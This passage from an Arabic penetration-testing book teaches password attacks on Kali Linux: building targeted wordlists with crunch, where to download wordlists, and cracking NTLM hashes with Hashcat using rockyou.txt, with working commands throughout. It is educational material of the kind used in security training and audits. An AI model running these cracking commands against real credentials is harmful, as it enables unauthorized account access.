‫ﯾﻌﺗﻣد ﺑﻛﺛره ﻋﻠﻰ اﺳﺗﺧدام اﻟﻣﻠف ‪ charset.lst‬اﻟﻣوﺟود ﻓﻲ ﻣﺳﺎر اﻟﺗﺛﺑﯾت ]‪ [/etc/share/crunch‬ﺣﯾث ان ھذا اﻟﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ‬
‫اﻟﻘواﻋد اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻓﻲ ﺗوﻟﯾد اﻟﻘواﻣﯾس‪ .‬ﻟذﻟك ﺳوف ﻧﺣﺗﺎج إﻣﺎ إﻟﻰ ﺗﺷﻐﯾل ‪ crunch‬ﻣن ﺧﻼل ھذا اﻟﻣﺳﺎر أو اﻹﺷﺎرة إﻟﻰ ھذا‬
‫اﻟﻣﺳﺎر ﻣﻊ اﺳﺗﺧدام اﻟﺗﻌﺑﯾر )‪(-f‬وذﻟك ﻋﻧد اﺳﺗﺧدام ﻣﺟﻣوﻋﺎت اﻷﺣرف اﻷﻛﺛر ﺗﻘدﻣﺎ‪.‬‬

‫ﻟﻠﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ ﺗوﻟﯾد اﻟﻛﻠﻣﺎت ﻧﻘوم ﺑﺎﻟﺗﻌدﯾل ﻋﻠﻰ ﻣﻠف اﻟﻘواﻋد ‪ charset.lst‬ﺑﻣﺣرر اﻟﻧﺻوص اﻟﻣﻔﺿل ﻟدﯾك ﺳوف ﺗﺟد ﺑداﺧل اﻟﻣﻠف اﻟﻌدﯾد ﻣن‬
‫اﻟﻘواﻋد اﻻﻓﺗراﺿﯾﺔ ﻣﻊ اﻟﺑرﻧﺎﻣﺞ وﺑﺟﺎﻧب ﻛل ﻗﺎﻋدة اﻟﻣﺣﺎرف اﻟﺗﻲ ﺳوف ﯾﺗﻛون ﻣﻧﮭﺎ اﻟﻘﺎﻣوس إذا اردت اﺳﺗﺧدام ﻣﺣﺎرف ﻣﻌﯾﻧﮫ ﺗﺧﺗﺎرھﺎ اﻧت‬
‫ﻋﻠﯾك ﺑﺈﻧﺷﺎء ﻗﺎﻋده ﺟدﯾده ﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﺳم اﻟﻘﺎﻋدة واﻟﻣﺣﺎرف اﻟﺗﻲ ﺗرﯾدھﺎ ان ﺗﻛون ھﻲ اﻟﻘﺎﻣوس ﻛﻣﺎ ھو ﻣوﺿﺢ ﺑﺎﻟﺻورة‬
‫اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫دﻋوﻧﺎ ﻧﺑدأ ﺑﺎﺳﺗﺧدام اﻷداة ‪ crunch‬ﻣﻊ اﺑﺳط اﺳﺗﺧدام ﻟﮭﺎ ﻋن طرﯾﻖ اﻻﺗﻲ‪:‬‬

‫ﺣﯾث ﯾﻣﺛل اﻟﻘﯾﻣﺔ ‪ 1‬طول أول واﻗل ﻛﻠﻣﺔ ﻓﻲ اﻟﻘﺎﻣوس واﻟﻘﯾﻣﺔ ‪ 3‬ﺗﻣﺛل طول اﺧر ﻛﻠﻣﮫ ﻓﻲ اﻟﻘﺎﻣوس‪ .‬وﻧﺎﺗﺞ ھذا اﻻﻣر ﺳوف ﯾﻛون ﻛﻠﻣﺎت‬
‫ﻣرﻛﺑﺔ ﻣن ﺣرف إﻟﻰ ﺛﻼﺛﺔ أﺣرف ﺗﺷﺗﻣل ﻋﻠﻰ ﻛل اﻷﺣرف اﻟﻼﺗﯾﻧﯾﺔ اﻟﺻﻐﯾرة ﺷﯾﺋﺎ ﻣن ھذا اﻟﻘﺑﯾل‪:‬‬
‫…‪a, b, c, d, e, f, g, h, i, j, etc‬‬
‫…‪aa, ab, ac, ad, ae, af, ag, ah, ai, aj, etc‬‬
‫…‪aaa, aab, aac, aad, aae, aaf, aag, aah, aai, aaj, etc‬‬
‫ﻣن ھذا اﻟﻣﺛﺎل ﻧﺟد ان ‪ crunch‬ﻓﻲ اﻷﺳﺎس ﯾﺑدا ﻣﻊ ﺣرف واﺣد وھو‪ a‬ﺛم ﯾﺳﺗﻣر ﻣن ﺧﻼل ﺟﻣﯾﻊ اﻟﻣﺣﺎرف اﻟﻣﺳﺗﺧدﻣﺔ ﺣﺗﻰ ﯾﺻل اﻟﻰ‬
‫اﻟﺣرف ‪.zzz‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪378‬‬

‫ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ ﺳوف ﻧﺣﺎول إﻧﺷﺎء ﺑﻌض ﻣن اﻟﻘواﺋم اﻷﻛﺛر ﺗﻌﻘﯾدا ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻣﻊ ‪ crunch‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻓﻲ ھذا اﻟﻣﺛﺎل اﺳﺗﺧدﻣﻧﺎ ﺧﺎﺻﯾﺔ ﺗﺣدد اﻷﺣرف اﻟﺗﻲ ﻧرﯾد ﺗﺷﻛﯾل اﻟﻘﺎﻣوس ﻣﻧﮭﺎ‪ ،‬واﻟﺗﻲ ﻛﺎﻧت ‪ .abcde1234‬واﻟﺗﻲ ﺳوف ﺗؤدى اﻟﻰ اﻧﺷﺎء‬
‫ﻣﻠف ﻛﻠﻣﺎت ﻋﺑﺎره ﻋن ﻛﻠﻣﺎت ﻣن ﺛﻼﺛﺔ ﻗﯾم وأرﺑﻌﺔ ﻗﯾم ﻣرﻛﺑﺔ ﻣن اﻷﺣرف اﻟﻣذﻛورة وﻓﻰ ﻣﺛﺎﻟﻧﺎ ھﻧﺎ ﻣﺛل ‪ aa1‬و‪ bb3‬و‪ .a212‬ﺣﯾث ﺗﺑدأ ب‬
‫‪ aaa‬وﺗﻧﺗﮭﻲ ب ‪.4444‬‬
‫ﯾﻣﻛﻧﻧﺎ أﯾﺿﺎ اﺳﺗﺧدام ﺧﺎﺻﯾﺔ ﺗﺣدد اﻷﺣرف ﻋن طرﯾﻖ اﻻﺳﺗﻌﺎﻧﺔ ﺑﺎﻟﻣﻠف ‪ charset.lst‬اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻣﻌظم اﻟﺗﺷﻛﯾﻼت اﻟﻣﻣﻛﻧﺔ ﻣن‬
‫اﻷﺣرف أو اﻻرﻗﺎم اﻟﺗﻲ ﻧرﯾد ﺑﮭﺎ ﺗﺷﻛﯾل اﻟﻘﺎﻣوس ﻣﻧﮭﺎ‪ ،‬وھذا اﻟﻣﻠف ﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر ‪ /usr/share/crunch/‬ﻓﻧذﻛره ﻣﻊ ﻣﺳﺎره ﺛم اﺳم‬
‫اﻟﺗﺷﻛﯾﻠﺔ ﻋﻧد اﺳﺗﺧداﻣﮫ ﻣﻊ اﻟﺗطﺑﯾﻖ ‪ .crunch‬وﻟﻣﻌرﻓﺔ اﻟﺗﺷﻛﯾﻼت اﻟﻣﺗﺎﺣﺔ واﺳﻣﺎءھﺎ ﻧذھب إﻟﻰ اﻟﻣﻠف اﻟﻣذﻛور وﻧﺧﺗر ﻣﻧﮭﺎ ﻣﺎ ﻧرﯾد وﯾﻣﻛﻧك‬
‫أﯾﺿﺎ إﺿﺎﻓﺔ اﻟﺗﺷﻛﯾﻼت اﻟﺗﻲ ﺗرﯾدھﺎ ﻛﻣﺎ ذﻛرﻧﺎ ﻣن ﻗﺑل‪.‬‬

‫ﺣﯾث ﻗﻣﻧﺎ ﻓﻲ ھذا اﻟﻣﺛﺎل ﺑﺈﻧﺷﺎء ﻗواﺋم ﻛﻠﻣﺎت ﻣﻛون ﻣن ﺛﻼﺛﺔ ﻗﯾم اﻟﻰ أرﺑﻌﺔ ﻗﯾم ﻣرﻛﺑﮫ ﻣن اﻷﺣرف اﻟﻣذﻛورة ﻓﻲ اﻟﻣﻠف ‪ charset.lst‬ﺗﺣت‬
‫ﺑﻧد ‪ hex-lower‬واﻟﺗﻲ ﺗﻌﻧﻰ اﻟﻘﯾم اﻷﺗﯾﺔ ‪ 0123456789abcdef‬ﺣﯾث ﺗﺑدأ ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ب ‪ 000‬وﺗﻧﺗﮭﻲ ب ‪.ffff‬‬

‫اﯾﺿﺎ ﺗﺳﺗطﯾﻊ ﻋﻣل ﻗﺎﻣوس ﺑﺧﺎﻧﺎت ﻣﻌﻠوﻣﺔ ﻣﺳﺑﻘﺎ ﺑواﺳطﺔ اﻟﺧﯾﺎر ‪ t‬ﻣﺛﻼ ارﯾد ﻗﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﺧﻣس ﺧﺎﻧﺎت ﺗﻛون اﻟﺧﺎﻧﺔ اﻟﺛﺎﻧﯾﺔ واﻟﺛﺎﻟﺛﺔ‬
‫واﻟراﺑﻌﺔ ﻣﻌﻠوﻣﺔ واﻟﺑﻘﯾﮫ ﻏﯾر ﻣﻌﻠوﻣﺔ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺗﮭﺎ ﺑﺎﻟﺻﯾﻐﺔ اﻟﺗﺎﻟﯾﺔ ‪ %123%‬ﺟﻣﯾﻊ اﻟﺧﺎﻧﺎت ﻏﯾر ﻣﻌروﻓﮫ ﻣﺎ ﻋدا اﻟﺗﻲ ﻗﻣﻧﺎ ﺑﻛﺗﺎﺑﺗﮭﺎ‪.‬‬
‫وﯾﺟب ان ﻧﻧﺗﺑﮫ ﺣﯾث اﻧﮫ ﻣﻊ ھذا اﻟﺧﯾﺎر ﯾﺳﺗﺧدم ﺑﻌض اﻟﺗﻌﺑﯾرات اﻟﻣﺣددة ﻛﺎﻻﺗﻰ‪:‬‬
‫ﺣﯾث ﯾرﻣز إﻟﻰ اﻟﺣرف اﻟﺻﻐﯾر ﺑﺎﻟرﻣز"@" وإﻟﻰ اﻟﺣرف اﻟﻛﺑﯾر ﺑﺎﻟرﻣز"‪ ",‬وإﻟﻰ اﻟرﻗم ﺑﺎﻟرﻣز "‪ "%‬وإﻟﻰ اﻟرﻣوز ‪ symbols‬ﺑﺎﻟرﻣز "^"‬
‫‪@: Inserts lowercase characters‬‬
‫‪%: Inserts numbers‬‬
‫‪,: Inserts uppercase characters‬‬
‫‪^: Inserts symbols‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻓﺈﻧﻧﺎ ﻧﻔﺗرض أﻧﻧﺎ ﻧﻌرف اﺳﺗﺧداﻣﺎت ھدﻓﻧﺎ ﺣﯾث ﯾﺳﺗﺧدم اﻟﻛﻠﻣﺔ ‪ pass‬وﻟﻛن ﺗﻠﯾﮭﺎ اﺛﻧﯾن ﻣن اﻟﻘﯾم اﻟﻐﯾر اﻟﻣﻌروﻓﺔ ﻓﻲ ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ﻟﺗﺷﻐﯾل ‪ crunch‬ﻟﻌﻣل ﻗﺎﺋﻣﺔ ﺑﻛﻠﻣﺎت ﻣرور ﻋﺑﺎره ﻋن ﺳﺗﺔ أﺣرف وﺗﻛون ﻋﺑﺎره ﻋن ‪ pass‬ﺛم ﺗﻠﯾﮭﺎ اﺛﻧﯾن ﻣن اﻟﻘﯾم‬
‫اﻟﻣﺟﮭوﻟﺔ‪ ،‬وﯾﺗم ذﻟك ﻋن طرﯾﻖ اﺳﺗﺧدم‪ %%‬ﻟﺗﻣﺛﯾل أي رﻗم‪ .‬ﻟﺗﺷﻐﯾل ھذا ووﺿﻊ اﻟﻧﺎﺗﺞ ﻓﻲ ﻣﻠف ﻧﺻﻲ ﯾدﻋﻰ ‪ ،newpasslist.txt‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#crunch 6 6 –t pass%% -o newpasslist.txt‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪379‬‬

‫ﺳوف ﯾﺣﺗوي اﻟﻣﻠف ﻧﺻﻲ اﻟﻧﺎﺗﺞ ﻣن اﻻﻣر ‪ crunch‬ﻛﺎﻓﺔ اﻟﺗرﻛﯾﺑﺎت اﻟﻣﻣﻛﻧﺔ‪ .‬ﺗظﮭر اﻟﺻورة اﻟﺗﺎﻟﯾﺔ اﻟﺟزء اﻟﻌﻠوي ﻣن ﻣﻠف اﻹﺧراج‪:‬‬

‫ﻣﻼﺣظﺔ‪ :‬اﻟﺧﯾﺎر ‪ t‬ﻻ ﯾﺳﺗﺧدم اﻻ ﻋﻧد اﺧﺗﯾﺎر ﺧﺎﻧﺎت ﺛﺎﺑﺗﮫ ﻣﺛل ﺧﻣس ﺧﺎﻧﺎت او ﻋﺷر ﺧﺎﻧﺎت او ﺳﺑﻊ ﺧﺎﻧﺎت ﻟﯾس ﻣن واﺣد اﻟﻰ ﺳﺑﻌﮫ اي‬
‫ﺗﻛون ﺟﻣﯾﻌﮭﺎ ﺳﺑﻊ ﺧﺎﻧﺎت ﻻ ﯾﺑدا ﻣن ﺧﺎﻧﮫ ﺻﻐرى أﺻﻐر ﻣن اﻟﻣذﻛورة ﻓﻲ اﻟﺧﯾﺎر ‪.t‬‬

‫‪Download Wordlists from the Web‬‬


‫إذا ﻛﺎن أي ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟواردة أﻋﻼه ﻟم ﺗﺳﺎﻋدك ﻓﻲ اﻟﺧروج ﺑﺎﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗرﯾدھﺎ أو ﻛﻧت ﺗرﯾد اﻟﻣزﯾد ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت‪ ،‬ﯾﻣﻛﻧك أﯾﺿﺎ‬
‫ﺗﺣﻣﯾﻠﮭﺎ ﻣن ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬ﻻﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﻛﺎﻟﻲ‪ .‬اﺛﻧﯾن ﻣن أﻓﺿل اﻟﻣواﻗﻊ اﻟﺗﻲ رأﯾﺗﮭﺎ ھﻲ ‪Skull Security‬و‪.CrackStation‬‬
‫‪Skull Security:‬‬
‫‪https://wiki.skullsecurity.org/Passwords‬‬
‫‪CrackStation:‬‬
‫‪https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm‬‬

‫)‪Hashcat and oclHashcat (Password Cracking with CUDA‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪380‬‬

‫اﻟﻣﺻدر‪http://hashcat.net/wiki :‬‬
‫ﺣﺗﻰ اﻵن ﻗﻣﻧﺎ ﺑﺗﻐطﯾﺔ اﻟﻌدﯾد ﻣن اﻟﺗﻘﻧﯾﺎت ﻟﻣﮭﺎﺟﻣﺔ ﻛﻠﻣﺎت اﻟﻣرور‪ .‬رأﯾﻧﺎ أﻧﮫ ﻓﻲ ﺑﻌض اﻷﺣﯾﺎن ﻣﺎ ﯾﻣﻛﻧك أن ﺗﻔﻌﻠﮫ ﺑﻣﺟرد اﻟﺑﺣث ﻓﻲ‬
‫‪ ،rainbow table‬وﻓﻲ ﺑﻌض اﻟﺣﺎﻻت ﯾﻣﻛﻧك ﺗﻣرﯾر اﻟﮭﺎش )‪.(pass the hash‬‬
‫وﻟﻛن اﻟﻛﺛﯾر ﯾﻌﺎﻧﻲ ﻣن ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور واﻟﻣﺷﺎﻛل اﻟﻛﺛﯾرة اﻣﺎ ﻟﺻﻌوﺑﺔ اﻟﻛﻠﻣﺔ او أن ﻋﻣﻠﯾﺔ اﻟﻛﺳر ﺑطﯾﺋﺔ او اﻟﻛﺛﯾر ﻣن اﻷﺳﺑﺎب‬
‫اﻷﺧرى‪ .‬ﻟذﻟك ﺳﻧﺗطرق اﻟﯾوم اﻟﻰ اﺣدى اﻟطرق اﻟﻣﺗﻘدﻣﺔ ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور واﻟﺗﻲ ﺗﺟﻌل اﻟﻛﺳر أﺳﮭل وأﺳرع ﺑﻛﺛﯾر ﻣن اﻟطرق اﻟﺗﻘﻠﯾدﯾﺔ‬
‫واﻟﺗﻲ ﺗﺻل ﺳرﻋﺗﮭﺎ اﻟﻰ أﻛﺛر ﻣن ‪ 10‬ﻣﻠﯾون ﻣﺣﺎوﻟﺔ ﻓﻲ اﻟﺛﺎﻧﯾﺔ‪ .‬ﻟك ان ﺗﺗﺧﯾل ﺳرﻋﺗﮫ ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻌﻘدة واﻟﺗﻲ ﺗﺻل ﻟﻌدة دﻗﺎﺋﻖ‬
‫ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺔ ‪ CUDA‬وﻟﻛن ﻣﺎ ﻣﻌﻧﻰ ‪CUDA‬؟‬
‫ھﻲ اﺧﺗﺻﺎر ل‪ Compute Unified Device Architecture‬ھﻲ ﻋﺑﺎرة ﻋن ﻣﻧﺻﺔ اﻟﺣوﺳﺑﺔ اﻟﻣﺗوازﯾﺔ اﻟﺗﻲ ﯾزﯾد أداء‬
‫اﻟﺣوﺳﺑﺔ ﻋن طرﯾﻖ ﺗﺳﺧﯾر ﻗوة ‪) GPU‬وﺣدات اﻟﻣﻌﺎﻟﺟﺔ ﻓﻲ ﻛروت اﻟﺷﺎﺷﺔ اﻟﺣدﯾﺛﺔ ﺗﺳرع ﻣن اﻟﻌﻣﻠﯾﺎت ﺑﺷﻛل ﻛﺑﯾر ﺗم ﺗطوﯾرھﺎ ﻋن طرﯾﻖ‬
‫ﺷرﻛﺔ ‪ .(NVidia‬وﻣﻊ ﻣرور اﻟوﻗت‪ ،‬ازداد ﻗوة اﻟﻣﻌﺎﻟﺟﺔ ‪ GPU‬ﺑﺷﻛل ﻛﺑﯾر ﻣﻣﺎ ﯾﺗﯾﺢ ﻟﻧﺎ اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧداﻣﮭﺎ ﻟﻸﻏراض اﻟﺣﺳﺎﺑﯾﺔ ﻟدﯾﻧﺎ‬
‫وﻟﻸﻏراض اﻟﻌرض اﻟﺗوﺿﯾﺣﻲ‪.‬‬
‫‪CUDA Cracking‬‬
‫ھﻲ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام ﻣوارد ﻛﺎرت اﻟﺷﺎﺷﺔ وھﻲ أﺳرع ﻋﺷرات اﻷﺿﻌﺎف ﻣن ﺳرﻋﺔ ‪ .CPU‬ﯾﺟب ان ﯾدﻋم ﻛﺎرت اﻟﺷﺑﻛﺔ‬
‫ﻟدﯾك ﺗﻘﻧﯾﺔ ‪ CUDA‬أوﻻ‪ .‬ﻛﻠﻣﺎ ذاد ﻋدد ‪ CUDA cores‬ﻛﻠﻣﺎ ﻛﺎن اﻷداء اﻗوى وأﺳرع‪.‬‬
‫ﺳﻧﺳﺗﺧدم ﻓﻲ ھذا اﻟﺟزء اﻟﻌدﯾد ﻣن اﻷدوات اﻟﻣﻧدرﺟﺔ ﺟﻣﯾﻌﮭﺎ ﺗﺣت اﻷداة ‪ Hashcat‬ﻟﻧظﺎﻣﻲ اﻟﺗﺷﻐﯾل ﺳواء ﻟوﯾﻧدوز او ﻟﻠﯾﻧﻛس‪.‬‬

‫‪Hashcat and OclHashcat‬‬

‫‪ Hashcat‬و‪ oclHashcat‬ھﻲ ادوات ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور واﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل ﻛل ﻣن ﻣﻌﺎﻟﺞ ﺑطﺎﻗﺎت اﻟرﺳوم )‪ (GPU‬او وﺣدة اﻟﻣﻌﺎﻟﺟﺔ‬
‫اﻟﻣرﻛزﯾﺔ )‪ (CPU‬اﻟﺧﺎص ﺑك‪ OclHashcat .‬ھو ﻧﺳﺧﺔ ‪ GPGPUbased‬أي اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﻣﻌﺎﻟﺞ ﺑطﺎﻗﺔ اﻟرﺳوم اﻟﺧﺎص ﺑك‬
‫)‪ (GPU‬وﻛﺎﻧت ﺗﺳﻣﻰ ھﻛذا ﻗدﯾﻣﺎ أﻣﺎ اﻻن ﻓﺄﺻﺑﺣت ﺗﺳﻣﻰ ‪OclHashcat-plus‬او ‪ CUDAHashcat-plus‬ﻋﻠﻰ ﺣﺳب ﻧوع ﻛﺎرت‬
‫اﻟﺷﺎﺷﺔ اﻟﻣﺳﺗﺧدم واﻟﺗﻲ ﺗﻛون اﺳرع ﺑﻛﺛﯾر ﻣن ‪ Hashcat‬اﻟذى ﯾﻌﺗﻣد ﻓﻘط ﻋﻠﻰ ‪ Hashcat/oclHashcat .CPU‬ھﻲ أدوات ﻣﺗﻌددة‬
‫اﻟﻌﻣﻠﯾﺎت )‪ (Multi Threating‬اﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ اﻟﺗﻌﺎﻣل ﻣﻊ ھﺎش ﻣﺗﻌدد وﻗواﺋم ﻛﻠﻣﺎت ﻣﺗﻌددة ﺧﻼل ﺟﻠﺳﺔ ھﺟوم واﺣده‪ .‬وذﻟك ﻻن وﺣدة‬
‫اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل اﻟﻌدﯾد ﻣن اﻟﻣواﺿﯾﻊ‪ ،‬واﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ‪ .‬وﻟﻛن اﻟﺳرﻋﺔ اﻟﺣﻘﯾﻘﯾﺔ ﯾﺄﺗﻲ دوره ﻋﻧد اﺳﺗﺧدام‬
‫ﻗوة ‪ .GPU‬إذا ‪ GPU‬اﻟﺧﺎﺻﺔ ﺑك ﯾﻣﻛﻧﮭﺎ ﺗﺷﻐﯾل اﻟﻣﺋﺎت ﻣن اﻟﻣواﺿﯾﻊ‪ ،‬ﯾﺗم اﺳﺗﺧدام ﻛل ھذه اﻟﻘوة ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﯾﻣﻛﻧك ﺣﺗﻰ ﺗﺳﺧﯾر‬
‫ﻗوة وﺣدات ﻣﻌﺎﻟﺟﺔ اﻟرﺳوﻣﺎت ﻟﺑطﺎﻗﺎت ﻓﯾدﯾو ﻣﺗﻌددة ﻹﻧﺷﺎء ﻣﺣطﺔ ﻗوﯾﺔ ﺟدا ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫‪ Hashcat/oclHashcat‬ﺗﻘدم اﻟﻌدﯾد ﻣن ﺧﯾﺎرات اﻟﮭﺟوم‪ ،‬ﻛﺎﻻﺗﻲ‪:‬‬

‫ﯾوﻓر ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ اﻟﻌدﯾد ﻣن إﺻدارات اﻠ‪ Hashcat‬واﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول اﻟﯾﮭﺎ ﻣن ﺧﻼل اﻻﺗﻲ‪:‬‬

‫‪Applications | Kali Linux | Password Attacks | GPU Tools | oclhashcat-lite‬‬


‫‪Applications | Kali Linux | Password Attacks | GPU Tools | oclhashcat-plus‬‬
‫‪Applications | Kali Linux | Password Attacks | Offline Attacks| hashcat‬‬
‫‪Applications | Kali Linux | Password Attacks | Offline Attacks| oclhashcat-lite‬‬
‫‪Applications | Kali Linux | Password Attacks | Offline Attacks| oclhashcat- plus‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪381‬‬

‫ﻧﺣن اﻻن ﺳوف ﻧذھب ﻟﺗﺷﻐﯾل‪ ، Hashcat‬وﻟﻛﻧﻧﺎ ﺑﺣﺎﺟﺔ ﻟﻣﻌرﻓﺔ ﻋدد ﻗﻠﯾل ﻣن اﻷﺷﯾﺎء‪ .‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻣﻌرﻓﺔ ﻣﺎ ﻧوع اﻟﮭﺎش اﻟذي ﻧﺳﺗﺧدﻣﮫ‪،‬‬
‫واﺳم اﻟﻣﻠف اﻟﮭﺎش‪ ،‬اﺳم ﻣﻠف اﻟﻘﺎﻣوس وأﺧﯾرا اﺳم اﻟﻣﻠف اﻟﻧﺎﺗﺞ ﻟﺗﺧزﯾن ﻧﺎﺗﺞ ﻛﺳر اﻟﮭﺎش ﺑﮫ‪.‬‬
‫ﯾﻣﻛﻧك ان ﺗرى اﻟﺧﯾﺎرات اﻟﻣﺧﺗﻠﻔﺔ ﻣن ﺧﻼل ﻓﺗﺢ ﻧﺎﻓذة اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ "‪."hashcat --help‬‬

‫دﻋوﻧﺎ اﻻن ﻧﻣﺿﻲ ﻗدﻣﺎ ﻣﻊ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪:‬‬


‫‪ -‬ﻧﻘوم ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل ﺛم ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#hashcat -m 1000 Easyhash.txt rockyou.txt -o cracked.txt‬‬
‫ﺣﯾث ﯾﺧﺑرﻧﺎ اﻟﺧﯾﺎر )‪ (-m 1000‬ان ﻧوع اﻟﮭﺎش اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره ﻣن اﻟﻧوع ‪ ،NTLM‬اﻟﻣﻠف ‪ Easyhash.txt‬ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش‬
‫اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره‪ ،‬اﻟﻣﻠف ‪ rockyou.txt‬ﯾﺣﺗوي ﻋﻠﻰ ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻓﻲ ﻓك اﻟﺗﺷﻔﯾر‪ ،‬وأﺧﯾرا اﻟﻣﻠف ‪cracked.txt‬‬
‫اﻟذي ﯾﺄﺗﻲ ﺑﻌد اﻟﺧﯾﺎر )‪ (-o‬واﻟذي ﯾوﺿﻊ ﻓﯾﮫ ﻧﺎﺗﺞ ﻋﻣﻠﯾﺔ ﻓك اﻟﺗﺷﻔﯾر‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﺳﺗﺧدم اﻟﺧﯾﺎر )‪ (-m‬ﻓﻲ ﺗﺣدﯾد ﻧوع اﻟﮭﺎش واﻟﺧﯾﺎر )‪ (-a‬ﻟﺗﺣدﯾد ﻧوع اﻟﮭﺟوم اﻟذي ﺗرﯾد ان ﺗﺳﺗﺧدﻣﮫ ﻓﻼ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫ﻓﯾﻣﺎ ﯾزﯾد ﻗﻠﯾﻼ ﻋﻠﻰ اﻟﺛواﻧﻲ ﺳوف ﺗﺷﺎھد ھذا‪:‬‬ ‫‪-‬‬

‫ﻧﻘوم اﻻن ﺑﻔﺗﺢ ﻧﺎﺗﺞ اﻻﻣر ‪ hashcat‬واﻟذي ﺗم ﺗﺳﺟﯾﻠﮫ ﻓﻲ اﻟﻣﻠف ‪ cracked.txt‬ﻟﻧرى ﻣﺎ ﻗﺎﻣت ﺑﮫ اﻷداة ﻣن ﻛﺳر اﻟﮭﺎش‬ ‫‪-‬‬
‫وﺗرﺟﻣﺗﮫ اﻟﻰ ﻛﻠﻣﺔ ﻣرور ﻓﻲ ﻧص ﻏﯾر ﻣﺷﻔر‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪382‬‬

‫ﻛﻣﺎ ﺗرى‪ ،‬ﻓﻠﻘد ﺗم ﻛﺳر ‪ 13‬ﻛﻠﻣﺎت ﻣرور ﻓﻲ ﺣواﻟﻲ ﺛﺎﻧﯾﺔ وﻧﺻف‪ .‬ﻓﻠﻧﻠﻘﻲ ﻧظرة ﻓﺎﺣﺻﺔ ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور ھذه ﻧﺟدھﺎ ﻣن أﻛﺛر‬ ‫‪-‬‬
‫اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗم ﻛﺳرھﺎ ﻓﻲ ﻋﺎم ‪ .2012‬ﻋن طرﯾﻖ اﺳﺗﺧدام أي ﻣن ھذه اﻟﻛﻠﻣﺎت ﻓﺈﻧﮭﺎ ﻟن ﺗﺻﻣد أﻣﺎم أي أداة ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور‬
‫ﻷﻛﺛر ﻣن ﺟزء ﻣن اﻟﺛﺎﻧﯾﺔ‪.‬‬
